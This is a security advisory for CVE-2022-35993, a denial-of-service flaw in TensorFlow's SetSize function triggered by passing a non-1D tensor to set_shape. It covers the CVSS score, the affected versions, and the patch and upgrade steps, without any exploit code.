CVE-2022-35993 : Security Advisory and Response

TensorFlow is an open source platform for machine learning. The vulnerability in

SetSize

function can lead to a denial of service attack. Learn about the impact, technical details, and mitigation steps related to CVE-2022-35993.

Understanding CVE-2022-35993

This section provides key information about the CVE-2022-35993 vulnerability in TensorFlow.

What is CVE-2022-35993?

TensorFlow is affected by a vulnerability in the

SetSize

function that allows an attacker to trigger a denial of service attack by passing a non-1D tensor to the

set_shape

input.

The Impact of CVE-2022-35993

The vulnerability has a CVSS base score of 5.9 (Medium) with a high impact on availability. There are no known workarounds for this issue.

Technical Details of CVE-2022-35993

Explore the technical aspects of CVE-2022-35993 below.

Vulnerability Description

The vulnerability arises when

SetSize

receives a non-1D tensor as an input to

set_shape

, leading to a

CHECK

fail that can be exploited for a denial of service attack.

Affected Systems and Versions

TensorFlow versions prior to 2.7.2, 2.8.1, and 2.9.1 are affected by this vulnerability.

Exploitation Mechanism

The vulnerability can be exploited by providing a non-1D tensor as input to the

SetSize

function, triggering a denial of service condition.

Mitigation and Prevention

Discover the steps to mitigate and prevent the CVE-2022-35993 vulnerability.

Immediate Steps to Take

Update TensorFlow to version 2.10.0 to apply the necessary patch.

Long-Term Security Practices

Regularly update TensorFlow to the latest version to address security vulnerabilities.

Patching and Updates

The issue has been patched in TensorFlow 2.10.0, and the fix has been backported to versions 2.7.2, 2.8.1, and 2.9.1 to address the vulnerability.